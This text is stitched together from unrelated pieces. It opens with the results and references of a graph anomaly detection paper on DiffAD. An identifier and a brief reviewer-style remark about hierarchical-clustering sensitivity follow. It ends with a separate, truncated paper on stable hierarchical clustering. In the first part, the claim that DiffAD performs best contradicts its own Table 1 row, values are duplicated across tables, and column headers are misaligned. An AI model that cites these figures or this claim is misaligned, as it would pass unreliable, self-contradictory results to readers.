\sum_{v_i \in V_y} \frac{1}{|V_y|} \left[ \log \psi(v_i | y) + \frac{1}{|G_a|} \sum_{g=1}^{|G_a|} \log \psi(v_i^g | y) \right], \] where \( \psi(v_i^g | y) \) predicts the possibility of node \( v_i \) being an anomaly or normal. ### 7 Experiments #### 7.1 Experimental Setup The nine graph anomaly detection datasets can be categorized into two groups: one with organic anomalies, including YelpChi (Rayana & Akoglu, 2015), Reddit (Wang et al., 2021a), Weibo (Zhao et al., 2020), Tfinance, Tolokers and Questions (Tang et al., 2023); and another with injected anomalies (BlogCatalog (Ding et al., 2019), ACM (Ding et al., 2019), and Cora (Liu et al., 2022b)). Our methods are compared against three GNN detectors built upon GCN (Kipf & Welling, 2017), GAT (Veličković et al., 2018), and GraphSAGE (Hamilton et al., 2017), seven state-of-the-art semi-/supervised anomaly detectors: GeniePath (Liu et al., 2019), FdGars (Wang et al., 2019), BWGNN (Tang et al., 2022), DAGAD (Liu et al., 2022a), GAT-sep (Zhu et al., 2020), AMNet (Chai et al., 2022), GHRN (Gao et al., 2023a), and two contrastive detectors, namely CONAD (Xu et al., 2022b) and CoLA (Liu et al., 2021). We use a training ratio of 20% and report the 5-fold average performance (in percentage) along with the standard deviation using four commonly used metrics: Macro-F1, Macro-Precision, Macro-Recall, and AUC (Ma et al., 2021). More details of the datasets and baselines can be found in Appendix J. #### 7.2 Anomaly Detection Performance From the results in Tables 1 and 4 (Appendix J), we see that DiffAD achieves the best results on almost all datasets. This confirms the validity of our second recipe that synthesized graphs could Table 1: Detection results on six datasets (best in bold). | Method | YelpChi | Reddit | Weibo | BlogCatalog | ACM | Core | |--------------|---------|--------|-------|-------------|-----|------| | | M-F1 | AUC | M-F1 | AUC | M-F1| AUC | | GAT | 46.08±0.1 | 57.90±0.1 | 49.20±0.1 | 57.74±0.1 | 85.32±0.1 | 85.64±0.1 | | GraphSAGE | 60.86±0.2 | 80.36±0.1 | 49.15±0.1 | 51.31±0.2 | 89.20±0.1 | 88.35±0.2 | | GeniPath | 46.08±0.1 | 48.74±0.1 | 49.15±0.1 | 46.30±0.1 | 55.06±1.7 | 62.94±1.4 | | FdGars | 49.77±0.1 | 53.01±0.5 | 48.52±0.2 | 61.05±0.1 | 87.65±0.1 | 93.11±0.6 | | BWGNN | 52.08±0.2 | 59.83±0.1 | 49.15±0.1 | 61.49±0.3 | 89.63±0.1 | 91.05±0.1 | | DAGAD | 65.93±0.3 | 80.01±0.3 | 49.16±0.1 | 50.22±0.5 | 91.92±0.2 | 95.71±0.1 | | GAT-SEP | 65.59±0.1 | 81.92±0.1 | 45.60±0.3 | 66.09±0.4 | 99.26±0.1 | 91.78±0.2 | | AMNNS | 47.42±0.1 | 47.50±0.2 | 46.39±0.1 | 55.74±0.2 | 79.01±0.1 | 90.40±0.1 | | GHRN | 55.36±0.1 | 55.84±0.1 | 48.88±0.1 | 57.33±0.1 | 98.11±0.1 | 98.49±0.1 | | CONAD | 55.36±0.1 | 75.64±0.1 | 50.23±0.1 | 58.41±0.0 | 90.75±0.1 | 95.80±0.1 | | CoLa | 56.58±0.1 | 72.83±0.2 | 48.21±0.2 | 57.1±0.1 | 92.06±0.1 | 98.17±0.1 | | TRC-MLP | 73.88±0.1 | 97.94±0.1 | 51.85±0.1 | 72.20±0.1 | 90.54±0.1 | 95.48±0.5 | | DiffAD | 52.68±0.1 | 51.15±0.1 | 59.43±0.1 | 50.15±0.2 | 70.15±0.2 | 67.40±0.2 | complement anomaly detectors to better distinguish anomalies, thereby mitigating the shortage of labeled data. While DAGAD also aims to enhance performance through data augmentation, it primarily focuses on combining class-biased features and cannot generate auxiliary training samples. GeniPath, FdGars and BWGNN only investigate anomalies’ patterns by proposing new graph signal filtering algorithms or by constructing discriminating features from the raw data. They ignore the challenges imposed by the scarcity of anomalies, thus obtain compromised results. The performance of the three GNN detectors reveals the power of these vanilla GNN backbones but they still suffer from the oversmoothing problem of MP-GNNs (as described in §1). Our non-GNN methods (i.e., FSC, TRC-MLP, and TRC-TRANS), which are built in accordance with the new graph anomaly detection paradigm (first recipe), obtain the top-3 performance on Weibo dataset. We attribute this to the significantly lower feature similarities between anomalies and normal nodes (0.004 vs. 0.993) (Liu et al., 2022b), which makes anomalies’ trajectories easier to be distinguished from normal nodes. The competitive results on other datasets demonstrate that this paradigm worth future exploration. 7.3 Case study I - The efficacy of generated graphs We further investigate the effectiveness of our generated graphs in enhancing other state-of-the-art detectors by feeding them as additional training samples. For fairness, we generate one graph using DiffAD and reformulate existing detectors’ objectives (similar to Eq. (22)) to enjoy the training signals from the generated graph. We select two real-world datasets, namely YelpChi and Reddit, and report the improved performance and growth rate (in bracket) on M-F1 and AUC in Table 2. As can be seen, the additional graph samples can improve the performance of the existing detectors to different degrees. This empirically proves that the additional samples synthesized by DiffAD could provide complementary information about anomalies, leading to boosted performance. We also notice that such improvement is dependent on the detectors. We attribute this to the varying capabilities of each method in learning the data distribution and assimilating synthetic information. We report additional experiments on exploring the impact of the generated graphs, key parameters and the skip-step algorithm, as well as an ablation study in Appendix J. 8 Conclusion We offer two fresh recipes for graph anomaly detection based on our scrutiny of the forward diffusion process. We discover that anomalies can be distinguished with regard to their distinct dynamics in the diffusion process (first recipe), and the denoising network for generating auxiliary training data (second recipe) needs to be capable of recovering low frequency signals. Upon these findings, we design three non-GNN methods and a generative graph diffusion model to detect anomalies. Our methods deliver record-breaking performance across nine widely-used datasets, with merely 20% of labeled data, and our generated graphs also significantly boost other detectors’ performance. Table 2: Performance improvement brought by generated graphs. | Method | YelpChi | Reddit | |--------------|---------|--------| | | M-F1 | AUC | M-F1 | AUC | | GAT | 72.68±0.1 | 86.70±0.1 | 51.42±0.1 | 66.33±0.2 | | GraphSAGE | 74.21±0.1 | 87.51±0.1 | 52.29±0.1 | 67.90±0.2 | | GeniPath | 51.67±0.1 | 59.43±0.1 | 50.15±0.2 | 70.15±0.2 | | FdGars | 55.74±0.1 | 68.27±0.1 | 48.55±0.1 | 64.03±0.1 | | BWGNN | 64.88±0.2 | 81.06±0.1 | 47.69±0.1 | 70.31±0.1 | | DAGAD | 53.71±0.3 | 60.11±0.1 | 52.81±0.3 | 69.28±0.1 | | GAT-SEP | 60.15±0.1 | 61.69±0.1 | 51.15±1.8 | 67.52±0.3 | | AMNNS | 61.45±0.3 | 86.32±0.1 | 47.53±0.3 | 72.59±0.2 | | GHRN | 69.36±0.2 | 86.32±0.1 | 49.15±0.1 | 57.23±0.1 | | CONAD | 52.68±0.1 | 50.32±0.1 | 47.04±0.1 | 51.53±0.1 | | CoLa | 46.14±0.2 | 65.42±0.1 | 47.04±0.1 | 51.53±0.1 | REFERENCES Leman Akoglu. Anomaly mining: Past, present and future. In CIKM, pp. 1–2, 2021. Leman Akoglu, Hanghang Tong, and Danai Koutra. Graph based anomaly detection and description: A survey. Data Min. Knowl. Disc., 29:626–688, 2015. Mehdi Azabou, Venkataramana Ganesh, Shantanu Thakoor, Chi-Heng Lin, Lakshmi Sathidevi, Ran Liu, Michal Valko, Petar Veličković, and Eva L Dyer. Half-Hop: A graph upsampling approach for slowing down message passing. ICML, pp. 1341–1360, 2023. Ziwei Chai, Siqi You, Yang Yang, Shiliang Pu, Jiarong Xu, Haoyang Cai, and Weihao Jiang. Can abnormality be detected by graph neural networks? In Proceedings of the Thirty-First International Joint Conference on Artificial Intelligence, IJCAI-22, 2022. Ines Chami, Sami Abu-El-Haija, Bryan Perozzi, Christopher Ré, and Kevin Murphy. Machine learning on graphs: A model and comprehensive taxonomy. J. Mach. Learn. Res., 23(89):1–64, 2022. Dexiong Chen, Leslie O’Bray, and Karsten Borgwardt. Structure-aware transformer for graph representation learning. In ICML, pp. 3469–3489, 2022. Peng Cui, Xiao Wang, Jian Pei, and Wenwu Zhu. A survey on network embedding. IEEE Trans. Knowl. Data Eng., 31(5):833–852, 2019. Kaize Ding, Jundong Li, Rohit Bhanushali, and Huan Liu. Deep anomaly detection on attributed networks. In SDM, pp. 594–602, 2019. Yingtong Dou, Zhiwei Liu, Li Sun, Yutong Deng, Hao Peng, and Philip S Yu. Enhancing graph neural network-based fraud detectors against camouflaged fraudsters. In CIKM, pp. 315–324, 2020. Yuan Gao, Xiang Wang, Xiangnan He, Zhenguang Liu, Huamin Feng, and Yongdong Zhang. Addressing heterophily in graph anomaly detection: A perspective of graph spectrum. In Proceedings of the ACM Web Conference 2023, pp. 1528–1538, 2023a. Yuan Gao, Xiang Wang, Xiangnan He, Zhenguang Liu, Huamin Feng, and Yongdong Zhang. Alleviating structural distribution shift in graph anomaly detection. In Proceedings of the Sixteenth ACM International Conference on Web Search and Data Mining, pp. 357–365, 2023b. Dmitrii Gavrilev and Evgeny Burnaev. Anomaly detection in networks via score-based generative models. In ICML 2023 Workshop on Structured Probabilistic Inference & Generative Modeling, 2023. Ian Goodfellow, Yoshua Bengio, and Aaron Courville. Deep Learning, chapter Deep Feedforward Networks, pp. 163–220. MIT Press, Cambridge, MA, USA, 2016. Frank E Grubbs. Procedures for detecting outlying observations in samples. Technometrics, 11(1):1–21, 1969. William L. Hamilton, Rex Ying, and Jure Leskovec. Inductive representation learning on large graphs. In NeurIPS, pp. 1025–1035, 2017. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. In NeurIPS, pp. 6840–6851, 2020. Sepp Hochreiter and Jürgen Schmidhuber. Long short-term memory. Neural Computation, 9(8):1735–1780, 1997. Han Huang, Leilei Sun, Bowen Du, Yanjie Fu, and Weifeng Lv. GraphGDP: Generative diffusion processes for permutation invariant graph generation. In ICDM, pp. 201–210, 2022. Bowen Jing, Gabriele Corso, Regina Barzilay, and Tommi S Jaakkola. Torsional diffusion for molecular conformer generation. In NeurIPS, pp. 24240–24253, 2022.
lCLdLlXAvt
The average sensitivity of SHC is $O(\lambda D n)$, which can be made small by setting $\lambda \ll 1$. In the experiments, this is not always the case, for instance in Section 8. This signifies that SHC in practice doesn't really have a low average sensitivity.
Average Sensitivity of Hierarchical Clustering Anonymous authors Paper under double-blind review Abstract Hierarchical clustering is one of the most popular methods used to extract cluster structures in a dataset. However, if the hierarchical clustering algorithm is sensitive to a small perturbation to the dataset, then the credibility and replicability of the output hierarchical clustering are compromised. To address this issue, we consider the average sensitivity of hierarchical clustering algorithms, which measures the change in the output hierarchical clustering upon deletion of a random data point from the dataset. Then, we propose a divisive hierarchical clustering algorithm with which we can tune the average sensitivity. Experimental results on benchmark and real-world datasets confirm that the proposed method is stable against the deletion of a few data points, while existing algorithms are not. 1 Introduction Hierarchical clustering is one of the most popular methods used to extract cluster structures in a dataset consisting of data points (Murtagh and Contreras [2012b]). This method partitions the data points into clusters by constructing a rooted tree whose leaves correspond to data points and internal nodes represent clusters. By tracing the hierarchy from the root to leaves, we can extract interpretable knowledge from the dataset. For example, suppose that we have genomic data of single cells in a tissue. Then, the hierarchy can be used to figure out complex cellular states and tissue compositions (Zurauskienė and Yau [2016]). Hierarchical clusterings are also used in several applications such as phylogenetics (Eisen et al. [1998]), geophysics (Takahashi et al. [2019]), and social network analysis (Gilbert et al. [2011]). Because of the importance of hierarchical clustering, a plethora of hierarchical clustering algorithms have been proposed (Heller and Ghahramani [2005], Jain [2010], Hastie et al. [2009], Murtagh and Contreras [2012b]). These algorithms are mainly concerned with the quality of the output hierarchical clustering. However, there is another essential aspect that must not be overlooked: stability of the output hierarchical clustering. Since the output is often used to understand the data structure, an algorithm needs to be stable to data perturbations as long as the data distribution remains intact. This requirement can be naturally formalized as a question using the notion of average sensitivity (Varma and Yoshida [2021]): given a random deletion of data points from the original dataset, how stable is the output hierarchical clustering? In the example of genomic data, a stable and reliable algorithm is expected to retain most of the tissue compositions found in the original, even if a few cells are missing. However, in the example in Figure 1 and in the application to geophysics (Figure 3 in Section 8), we show that the existing algorithms are unstable for data point removals. In this work, we propose a novel algorithm for hierarchical clustering that is stable against deletions of data points. We measure the stability of an algorithm using average sensitivity (Murat and Yoshida [2019], Varma and Yoshida [2021]). Because the average sensitivity was originally defined for algorithms that output vectors or sets, we first formally define the average sensitivity of hierarchical clustering algorithms. Then, we propose a (randomized) algorithm that partitions the dataset in a top-down manner. The proposed algorithm applies a randomized process called the exponential mechanism (McSherry and Talwar [2007]) when partitioning the dataset, and we theoretically prove that it has a small average sensitivity. Figure 1 shows an illustrative example of sensitive/stable hierarchical clustering algorithms. In this example, the standard agglomerative method induces different hierarchies before and after one data Figure 1: Examples of a dataset (top left) and its hierarchical clusterings output by an existing agglomerative algorithm using complete linkage (top middle) and the proposed one (top right), and a dataset obtained by removing the data point 4 (bottom left) and its hierarchical clusterings output by the existing agglomerative algorithm (bottom middle) and the proposed one (bottom right). The existing agglomerative clustering algorithm is sensitive to the removal of even a single data point. The proposed algorithm produces a more stable clustering. The red nodes in the right trees denote the change from the trees in the left before the data removal. point (the data point 4) is removed, as shown in the middle of the figure. This result indicates that the widely used agglomerative method is sensitive to the removal of data points. The objective of this study is to design a hierarchical clustering algorithm that is stable against the removal of a few data points, as shown in the bottom of the figure. Randomized algorithms may output completely different hierarchical clusterings on the original dataset and on that obtained by deleting a random data point even if the output distributions are close. To alleviate this issue, we design a (randomized) hierarchical clustering algorithm with low average sensitivity under shared randomness, which outputs similar hierarchical clusterings both on the original dataset and on the dataset obtained by deleting a random data point with a high probability over the choice of the random bits used. We conduct comparisons between our proposed algorithm and existing algorithms with three benchmark datasets. In the experiments, we evaluated the trade-offs between the average sensitivity of the clustering algorithms and their clustering qualities. We observed that most of the existing algorithms exhibit high average sensitivity indicating that their output can change drastically even for the removal of a single data point. By contrast, the proposed algorithm can produce stable clustering results, while maintaining the quality of clustering. We also applied the clustering algorithms to a real-world GPS dataset (Takahashi et al., 2019). The results on this dataset also confirms that the existing algorithms are sensitive to data deletion, while the proposed algorithm is not. 2 RELATED WORK Hierarchical Clustering Algorithms for hierarchical clustering can be classified into agglomerative and divisive methods (Hastie et al., 2009). Given a dataset, an agglomerative method iteratively finds a pair of data points or clusters using a certain linkage criterion and merges them into a new cluster until all the data points are merged into a single cluster. As the linkage criterion, the single linkage, average linkage, and complete linkage rules are frequently used (Hastie et al., 2009; Murtagh and Contreras, 2012a). A divisive method constructs a hierarchy in a top-down manner. It recursively partitions a dataset into two sub-clusters until all the data points are partitioned or it reaches a prescribed tree depth (Yain, 2010). Several extensions of the clustering algorithms are considered; Abboud et al. (2019); Moseley et al. (2021) considered improving the computational scalability; Ackerman et al. (2012) introduced a weighted version of the agglomerative methods; and Kimes et al. (2017) and Gao et al. (2022) introduced statistical tests for clustering. Theoretical aspects of hierarchical clustering are also investigated; Dasgupta (2016) introduced a cost function for hierarchical clustering; Ackerman and Ben-David (2016) showed that the agglomerative methods have some desirable properties; and Roy and Pokutta (2016); Charikar and Chatziafratis (2017); Moseley and Wang (2017); Dhulipala et al. (2022) proposed methods with better approximation guarantees. We note that the focus of the studies above is on constructing hierarchies with better quality or more efficiency. The current study is orthogonal to them; our focus is on developing a hierarchical clustering algorithm that are stable against the deletion of a data point. Robust Hierarchical Clustering There have been a few studies on hierarchical clustering algorithms that exhibit robustness against outlier injections (Eriksson et al., 2013; Balcan et al., 2014; Cheng et al., 2019), which is a distinct form of data perturbation compared to the current study. These studies aim to achieve consistent clustering results regardless of the presence of outliers by identifying the injected outliers. It is important to note that hierarchical clustering algorithms can be unstable even in the absence of outliers. As demonstrated in Figure 1, although the underlying data distribution does not change after deleting a data point, the clustering results can differ significantly. For reliable knowledge discovery, it is imperative that the algorithm remains stable for such natural perturbations in the data. However, this specific type of robustness has not yet been thoroughly explored, making our study the first to venture in this direction. Average Sensitivity The notion of average sensitivity was originally introduced in Murai and Yoshida (2019) to compare network centralities in terms of their stability against graph perturbations. Then the notion was extended to handle graph algorithms in Varma and Yoshida (2021). Since then average sensitivity of algorithms for various problems have been studied, including the maximum matching problem (Yoshida and Zhou, 2021), spectral clustering (Peng and Yoshida, 2020), Euclidean k-clustering (Yoshida and Ito, 2022), dynamic programming problems (Kumabe and Yoshida, 2022a,b), and decision tree learning (Hara and Yoshida, 2023). 3 PRELIMINARIES We use bold symbols to denote random variables. For two random variables \( X \) and \( Y \) on a finite set \( E \), let \( d_{TV}(X, Y) := \sum_{e \in E} |\Pr[X = e] - \Pr[Y = e]|/2 \) denote the total variation distance between their distributions. For sets \( S \) and \( T \), let \( S \triangle T = (S \setminus T) \cup (T \setminus S) \) denote their symmetric difference. 3.1 Hierarchical Clustering Let \( X = \{x_1, \ldots, x_n\} \) be a dataset. We always assume that the data points \( x_1, \ldots, x_n \) are distinct (otherwise we assign them unique IDs so that they are distinct). A hierarchical clustering over \( X \) is a rooted tree \( T \) such that each leaf is corresponding to a subset of \( X \) and the subsets corresponding to leaves form a partition of \( X \). Note that hierarchical clustering considered in this work does not always decompose \( X \) into data points. Let \( \text{root}(T) \) denote the root node of \( T \). In this work, we mostly consider binary trees and let \( \text{left}(T) \) and \( \text{right}(T) \) denote the left and right, respectively, subtrees of \( \text{root}(T) \). If \( \text{root}(T) \) is the only node in \( T \), then we call \( T \) a singleton, and we define \( \text{left}(T) = \text{right}(T) = \emptyset \). Also we set \( \text{left}(T) = \text{right}(T) = \emptyset \) when \( T \) is an empty tree. Let \( \text{leaves}(T) \subseteq 2^X \) denote the leaves of \( T \). 3.2 Graph-Theoretic Notions For a finite set \( V \), we denote by \( \binom{V}{2} \) the set of pairs of elements in \( V \). For a set \( V \) and \( i \in V \), we sometimes write \( V - i \) to denote \( V \setminus \{i\} \). Let \( G = (V, E) \) be a graph. For a vertex \( i \in V \), let \( G - i \) denote the graph obtained from \( G \) by deleting \( i \) and the edges incident to \( i \). For a vertex set \( S \subseteq V \), let \( G[S] \) denote the subgraph of \( G \) induced by \( S \). Let \( G = (V, E, w) \) be a weighted graph, where \( w : E \rightarrow \mathbb{R}_+ \) is a weight function over edges. For disjoint sets of vertices \( S, T \subseteq V \), let \( c_G(S, T) \) denote the total weight of edges between \( S \) and \( T \), that is, \( \sum_{i \in S, j \in T} w(i, j) \). We denote by \( \phi_G(S) \) the sparsity of \( S \), that is, \( c_G(S, V \setminus S)/(|S| \cdot |V \setminus S|) \). 3.3 Exponential Mechanism The exponential mechanism (McSherry and Talwar, 2007) is an algorithm that, given a vector \( x \in \mathbb{R}^n \) and a real number \( \lambda > 0 \), returns an index \( i \in [n] \) with probability proportional to \( e^{-\lambda x_i} \). The following fact is useful to design algorithms with low average sensitivity. **Lemma 3.1** (McSherry and Talwar (2007)). Let \( \lambda > 0 \) and let \( A \) be the algorithm that, given a vector \( x \in \mathbb{R}^n \), applies the exponential mechanism to \( x \) and \( \lambda \). Then for any \( t > 0 \), we have \[ \Pr_{i \sim A(x)} \left[ x_i \geq \text{OPT} + \frac{\log n}{\lambda} + \frac{t}{\lambda} \right] \leq e^{-t}, \] where \( \text{OPT} = \min_{i \in [n]} x_i \). Moreover, for \( x' \in \mathbb{R}^n \), we have \[ d_{TV}(A(x), A(x')) = O(\lambda \cdot \|x - x'\|_1). \] 4 Average Sensitivity of Hierarchical Clustering In this section, we formally define the average sensitivity of a hierarchical clustering algorithm. 4.1 Distance between Hierarchical Clusterings First, we define distance between hierarchical clusterings. Let \( X = \{x_1, \ldots, x_n\} \) be a dataset, \( x \in X \) be a data point, and \( T \) and \( T' \) be hierarchical clusterings over \( X \) and \( X \setminus \{x\} \), respectively. Then, the distance \( d_x(T, T') \) between \( T \) and \( T' \) is defined recursively as follows. If both \( T \) and \( T' \) are empty trees, then \( d_x(T, T') \) is defined to be zero. Otherwise, we incur the cost of one if \[ \text{leaves(left}(T)) \triangle \text{leaves(left}(T')) \not\subseteq \{x\}, \quad \text{or} \quad \text{leaves(right}(T)) \triangle \text{leaves(right}(T')) \not\subseteq \{x\}. \] In words, we incur the cost of one if the left subtrees or the right subtrees differ besides the ignored element \( x \in X \). Then, we recursively compute the costs \( d_x(\text{left}(T), \text{left}(T')) \) and \( d_x(\text{right}(T), \text{right}(T')) \) and add them up. The details are given in Algorithm 1. It is easy to verify that \( d_x \) satisfies the triangle inequality. Also, note that \( d_x(T, T') \leq |T| + |T'| \), where \( |T| \) is the number of nodes in \( T \) (including the leaves). **Algorithm 1:** Distance between trees ``` Procedure \( d_x(T, T') \) if \( T = T' = \emptyset \) then return 0; if \( \text{leaves(left}(T)) \triangle \text{leaves(left}(T')) \not\subseteq \{x\} \) or \( \text{leaves(right}(T)) \triangle \text{leaves(right}(T')) \not\subseteq \{x\} \) then \( c \leftarrow 1 \). else \( c \leftarrow 0 \). return \( c + d_x(\text{left}(T), \text{left}(T')) + d_x(\text{right}(T), \text{right}(T')) \). ``` 4.2 Average Sensitivity Now we define the average sensitivity of a deterministic algorithm as follows: **Definition 4.1** (Varma and Yoshida (2021)). Let \( A \) be a deterministic algorithm that, given a dataset \( X = \{x_1, \ldots, x_n\} \), outputs a hierarchical clustering. Then, the average sensitivity of \( A \) on a dataset \( X = \{x_1, \ldots, x_n\} \) is \[ \frac{1}{n} \sum_{x \in X} d_x(A(X), A(X \setminus \{x\})). \] (1) To extend the definition to randomized algorithms, we define \( \text{EM}_x \) as the earth mover’s distance between two distributions with the underlying distance \( d_x \). Specifically, for distributions over hierarchical clusterings \( T \) and \( T' \), we define \( \text{EM}_x(T, T') = \min_D E_{(T,T') \sim D} d_x(T, T') \), where \( D \) runs over distributions over pairs of hierarchical clusterings such that the marginal distributions on the first and second coordinates are equal to \( T \) and \( T' \), respectively (sometimes called a coupling between \( T \) and \( T' \) in the literature). Then, we define the average sensitivity of a randomized algorithm as follows: Definition 4.2 (Varma and Yoshida (2021)). Let $A$ be a randomized algorithm that, given a dataset $X = \{x_1, \ldots, x_n\}$, outputs a hierarchical clustering. Then, the average sensitivity of $A$ on a dataset $X = \{x_1, \ldots, x_n\}$ is $$\frac{1}{n} \sum_{x \in X} \text{EM}_x(A(X), A(X \setminus \{x\})).$$ Note that this definition coincides with the one for deterministic algorithms when the algorithm is deterministic. Sometimes we want to guarantee that a randomized algorithm $A$ outputs similar hierarchical clusterings on $X$ and $X \setminus \{x\}$ when we use the same random coins. For a bit string $\pi$, let $A_\pi$ denote the deterministic algorithm obtained from $A$ by fixing the outcomes of its random coins to $\pi$. Then, we define the following variant of average sensitivity. Definition 4.3. Let $A$ be a randomized algorithm that, given a dataset $X = \{x_1, \ldots, x_n\}$, outputs a hierarchical clustering. Then, the average sensitivity of $A$ under shared randomness on a dataset $X = \{x_1, \ldots, x_n\}$ is $$E_\pi \left[ \frac{1}{n} \sum_{x \in X} d_x(A_\pi(X), A_\pi(X \setminus \{x\})) \right].$$ 5 STABLE-ON-AVERAGE HIERARCHICAL CLUSTERING 5.1 ALGORITHM DESCRIPTION In this section, we describe our algorithm for hierarchical clustering with low average sensitivity, and then derive some theoretical properties. In Section 6, we consider another algorithm with low average sensitivity under shared randomness. Our algorithm, SHC (Stable Hierarchical Clustering), is given in Algorithm 2. Given a dataset $X = \{x_1, \ldots, x_n\}$ and a parameter $\alpha > 0$, we first transform $X$ into a weighted graph $G = (V, E, w)$, where $V = \{1, 2, \ldots, n\}$, $E = \binom{V}{2}$, and $w(i, j) = \exp(-\alpha \|x_i - x_j\|^2)$, and then pass $G$ to a subroutine REC, which constructs a hierarchical clustering using $G$. Note that closer data point pairs get higher weights in $w$. If $\alpha$ is small, then every data point pair gets almost identical weight, and if $\alpha$ is large, then distant data point pairs get negligible weights and will be ignored in hierarchical clustering. The subroutine REC is recursive. Given a weighted graph $G = (V, E, w)$ and a depth limit $D \geq 0$, we split the vertex set into two components using a subroutine SSC (Stable Sparse Cut, Algorithm 3), and then recursively process them until the depth reaches $D$. Now we explain the details of the subroutine SSC. Ideally, we want to solve the sparsest cut problem, for which the goal is to compute $S \subseteq V$ that minimizes $\phi_G(S)$. However, approximating $\phi_G(S)$ to within a constant factor is NP-Hard (Chawla et al., 2006), and although some polynomial-time approximation algorithms (Arora et al., 2009; Leighton and Rao... are known, they are slow in practice because they internally solve LPs or SDPs, and it is not clear whether these are stable. Hence, we take a different approach. Our idea is to select a pair of vertices, called centroids, and then assign every other vertex to the more similar centroid to form a partition into two components. To achieve a small average sensitivity, we select the pair of centroids as follows. For \( \{i, j\} \in \binom{V}{2} \) with \( i < j \), let \( S_{ij} = \{k \in V : w(i, k) > w(j, k)\} \) be the set of vertices that is more similar to \( i \) than \( j \), and define \( \phi_G(i, j) = \phi_G(S_{ij}) \). Then, we sample a pair of centroids \( \{i, j\} \) using the exponential mechanism with the cost function \( \phi_G(\cdot, \cdot) \) and the given parameter \( \lambda \). When \( \lambda = 0 \), the exponential mechanism returns \( \{i, j\} \) uniformly sampled from \( \binom{V}{2} \), and when \( \lambda = \infty \), it returns \( \{i, j\} \) that minimizes \( \phi_G(i, j) \). ### 5.2 Theoretical Properties The time complexity of SHC is easy to analyze: **Theorem 5.1.** The time complexity of SHC is \( O(Dn^3) \). Next, we discuss the approximation guarantee and (a variant of) the average sensitivity of SSC. For a weighted graph \( G = (V, E, w) \), we define \[ \phi^*_G = \min_{\{i, j\} \in \binom{V}{2}} \phi_G(S_{ij}). \] Note that \( \phi^*_G \) is not the minimum sparsity of a set in \( G \), i.e., \( \min_{S \subseteq V} \phi_G(S) \). Let \( w_G \) denote the total edge weight, that is, \( \sum_{\{i, j\} \in \binom{V}{2}} w(i, j) \). The following holds: **Theorem 5.2.** For a weighted graph \( G \) of \( n \) vertices and \( \lambda > 0 \), let \( S = \text{SSC}(G, \lambda) \). Then, we have \[ E[\phi_G(S)] \leq \phi^*_G + O\left( \frac{\log(\lambda w_G)}{\lambda} \right). \] We also have \[ \frac{1}{n} \sum_{x \in V} d_{TV}(\text{SSC}(G, \lambda), \text{SSC}(G - k, \lambda)) = O\left( \frac{1}{n} (\lambda \phi^*_G + \log(nw_G)) \right). \] Because the weight function \( w \) is \([0, 1]\)-valued, \( \phi^*_G = O(1) \) and \( w_G = O(n^2) \). Then for \( \epsilon > 0 \), we obtain \( E[\phi_G(S)] = (1 + \epsilon)\phi^*_G \) by setting \( \lambda = \Theta(\log n / (\epsilon \phi^*_G)) \). For this particular choice of \( \lambda \), the average total variation distance is \( O(\log n / (\epsilon n)) \), which is quite small. Finally, we discuss the average sensitivity of SHC. **Theorem 5.3.** The average sensitivity of \( \text{SHC}(X, \alpha, \lambda, D) \) is \( O(D(\lambda w_G/n + \log(nw_G))) \), where \( G \) is the graph constructed by using \( X \) and \( \alpha \) in SHC. Recalling that \( w_G = O(n^2) \), the bound is roughly \( O(\lambda Dn) \), which can be made small by setting \( \lambda \ll 1 \). ### 6 Stable-on-Average Hierarchical Clustering under Shared Randomness In this section, we propose an algorithm SHC-SR by modifying SHC (Algorithm 2) so that it has a small average sensitivity under shared randomness. First, we design a randomized algorithm called SAMPLING that, given a vector \( p \in \mathbb{R}_+^n \) with \( \sum_{i=1}^n p_i = 1 \), and a random bit string \( \pi \), outputs \( i \in \{1, \ldots, n\} \) with probability \( p_i \) such that perturbing the vector \( p \) does not change the output with high probability over \( \pi \). For a set \( S \), let \( U(S, \pi) \) denote a procedure that outputs an element \( i \in S \) such that \( U(S, \pi) \) for a random bit string \( \pi \) provides a uniform distribution over \( S \). Such a procedure can be easily implemented by taking the first few bits from \( \pi \) and then map them to an element in \( S \). Then in SAMPLING\( (p, \pi) \), we first compute a permutation \( \sigma \) so that \( p_{\sigma(1)} \leq \cdots \leq p_{\sigma(n)} \) and compute some carefully designed vector \( q \in [0, 1]^n \) using \( p \) and \( \sigma \). Then, we sample \( t \in [0, 1] \) uniformly at random and if \( q_i > t \), then we return \( i \), and otherwise, we repeat the process. The vector \( q \) is designed so that this process outputs \( i \) with probability \( p_i \). The details are given in Algorithm 4. Because the only randomized process in SHC is the exponential mechanism used in SSC (Algorithm 3), by replacing it with SAMPLING that simulates the exponential mechanism, we obtain a hierarchical clustering algorithm SHC-SR with low average sensitivity under shared randomness: **Theorem 6.1.** There exists an algorithm SHC-SR that, given a dataset \( X = (x_1, \ldots, x_n) \), \( \alpha \geq 0 \), \( \lambda \geq 0 \), an integer \( D \), and a bit string \( \pi \), outputs a hierarchical clustering over \( X \) such that - the distribution of SHC-SR\((X, \alpha, \lambda, D, \pi)\) over random bits \( \pi \) is equal to that of SHC\((X, \alpha, \lambda, D)\). - the average sensitivity of SHC-SR\((X, \alpha, \lambda, D, \pi)\) under shared randomness is \( O(D(\lambda w_G/n + \log(nw_G))) \), where \( G \) is the graph constructed by using \( X \) and \( \alpha \) as in SHC. ### 7 EXPERIMENTS We demonstrate that the proposed SHC-SR (Section 6) can output stable hierarchical clustering using some benchmark datasets. For all the experiments, we used a workstation with 48 cores of AMD EPYC processors and 256GB of RAMS. #### 7.1 SETUPS **Datasets** We took three datasets shown in Table 1 from sklearn.datasets. For the experiments, we subsampled a fraction of the data points from a dataset so that we can assess the effect of the data size \( n \). **Hierarchical Clustering Algorithms** In the experiment, we implemented SHC-SR given in Theorem 6.1. We constructed weighted graphs by setting \( w(i,j) = \exp(-\alpha \|x_i - x_j\|^2/m) \) with \( m \) being the median of all the pairwise distance, and varied \( \alpha \) to some different values. We also varied the parameter \( \lambda \) used in SSC-SR. The case \( \lambda = \infty \) corresponds to a greedy algorithm that selects the pair \((i,j)\) with the smallest \( \phi_G(i,j) \) in SSC-SR (Algorithm 3) with the exponential mechanism being implemented with SAMPLING), and the case \( \lambda = 0 \) corresponds to an algorithm that selects the pair \((i,j)\) uniformly at random in SSC-SR. We implemented SHC-SR in Python 3 using the JIT compiler of Numba. We adopted some standard hierarchical clustering algorithms as baseline methods for comparison. As typical agglomerative clustering algorithms, we adopted four algorithms implemented in AgglomerativeClustering in scikit-learn with four different linkage criterion: ward, average, complete, and single, with the other options set to default. We note that Balcan et al. (2014) reported that ward tends to be robust against outlier injections and noise contamination. As the 